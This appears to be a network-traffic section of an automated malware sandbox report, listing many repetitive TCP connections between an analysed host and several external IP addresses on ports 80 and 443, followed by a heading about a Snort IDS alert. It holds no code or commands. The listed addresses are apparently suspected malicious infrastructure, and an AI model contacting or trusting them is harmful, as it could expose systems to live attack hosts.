Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49169
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 194.163.41.117:443
Source: global traffic	TCP traffic: 194.163.41.117:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49170
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 41.216.183.13:80 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 41.216.183.13:80
Source: global traffic	TCP traffic: 194.163.41.117:80 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 194.163.41.117:80
Source: global traffic	TCP traffic: 23.95.235.16:80 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 23.95.235.16:80
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 188.114.96.3:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443

Networking

Snort IDS alert for network traffic

Source: Traffic

